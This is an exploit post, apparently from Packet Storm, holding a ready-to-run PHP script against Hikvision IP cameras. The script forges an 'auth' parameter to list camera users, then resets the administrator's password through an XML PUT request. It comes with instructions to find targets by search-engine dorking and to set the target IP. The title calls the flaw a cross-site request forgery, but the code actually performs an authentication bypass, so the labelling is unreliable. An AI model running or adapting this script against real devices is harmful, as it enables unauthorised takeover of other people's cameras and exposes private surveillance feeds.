Hikvision IP Cameras suffer from a cross site request forgery vulnerability.
048a62691fff8ca9559f3569ecda16c64e4b8fff10f2234edeffc362e6ec8528=============================================================================================================================================
| # Title : Hikvision IP Camera CSRF Add ADmin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.hikvision.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] The vulnerability has been present in Hikvision products since 2014.
[+] add new admin.
[+] Line 104 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
class HikvisionExploit {
private $target;
private $port;
private $username;
private $password;
private $id;
private $storeCred;
public function __construct($target, $port = 80, $username = 'admin', $password = 'Pa$$W0rd', $id = 1, $storeCred = true) {
$this->target = $target;
$this->port = $port;
$this->username = $username;
$this->password = $password;
$this->id = $id;
$this->storeCred = $storeCred;
}
public function check() {
$auth = base64_encode("admin:" . $this->generateRandomPassword());
$url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);
$response = $this->sendRequest('GET', $url);
if (!$response) {
return 'No response received from the target!';
}
if ($response['http_code'] == 200) {
echo "Following users are available for password reset...\n";
$xml = simplexml_load_string($response['body']);
foreach ($xml->User as $user) {
echo "USERNAME: " . $user->userName . " | ID: " . $user->id . " | ROLE: " . $user->userLevel . "\n";
}
return 'Vulnerable';
} else {
return 'Safe';
}
}
public function exploit() {
if ($this->check() !== 'Vulnerable') {
return false;
}
echo "Starting the password reset for {$this->username}...\n";
$postData = "<User version=\"1.0\" xmlns=\"http://www.hikvision.com/ver10/XMLSchema\">\r\n" .
"<id>{$this->id}</id>\r\n" .
"<userName>{$this->username}</userName>\r\n" .
"<password>{$this->password}</password>\r\n</User>";
$auth = base64_encode("admin:" . $this->generateRandomPassword());
$url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);
$response = $this->sendRequest('PUT', $url, $postData, 'application/xml');
if (!$response) {
echo "Target server did not respond to the password reset request\n";
return false;
}
if ($response['http_code'] == 200) {
echo "Password reset for {$this->username} was successfully completed!\n";
echo "Please log in with your new password: {$this->password}\n";
if ($this->storeCred) {
$this->reportCreds();
}
} else {
echo "Unknown Error. Password reset was not successful!\n";
}
}
private function sendRequest($method, $url, $data = null, $contentType = null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
if ($contentType) {
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: $contentType"]);
}
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ['http_code' => $http_code, 'body' => $response];
}
private function generateRandomPassword($length = 10) {
return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, $length);
}
private function reportCreds() {
// In a real implementation, you could store the credentials into a database
echo "Credentials for {$this->username} were added to the database...\n";
}
}
// Example usage
$exploit = new HikvisionExploit('target-ip');
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed